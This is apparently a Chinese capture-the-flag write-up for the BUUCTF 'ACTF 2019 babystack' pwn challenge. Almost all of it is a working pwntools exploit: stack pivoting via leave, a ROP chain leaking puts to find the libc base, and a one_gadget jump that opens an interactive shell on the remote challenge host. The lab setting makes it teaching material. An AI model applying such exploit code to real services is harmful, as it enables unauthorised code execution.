BUU-actf_2019_babystack-WP
一道简单的通过leave栈迁移实现更长的rop链的题
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
pop_rdi_ret = 0x400ad3
context(log_level = 'debug')
sh = remote("node3.buuoj.cn","28568")
#sh = process("./ACTF_2019_babystack")
elf = ELF("./ACTF_2019_babystack")
libc = ELF("./buu-libc-2.23.so")
sh.sendlineafter("e?\n>",str(0xE0))
sh.recvuntil("at ")
stackaddr = int(sh.recvuntil("\n",drop = True),base = 16)
payload = 'fillfill' + p64(pop_rdi_ret) + p64(elf.got["puts"])
payload += p64(elf.symbols["puts"]) + p64(0x400800)
payload = payload.ljust(0xD0,'a')
payload += p64(stackaddr) + p64(0x400A18)
sh.sendafter('>',payload)
sh.recvuntil("e~\n")
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
LIBC = LibcSearcher('puts',puts_addr)
base = puts_addr - LIBC.dump('puts')
print base
sh.sendlineafter("e?\n>",str(0xE0))
sh.recvuntil("at ")
stackaddr = int(sh.recvuntil("\n",drop = True),base = 16)
payload = 'a'
payload = payload.ljust(0xD8,'a')
payload += p64(base + 0x10a38c)
sh.sendafter('>',payload)
sh.interactive()
和此题类似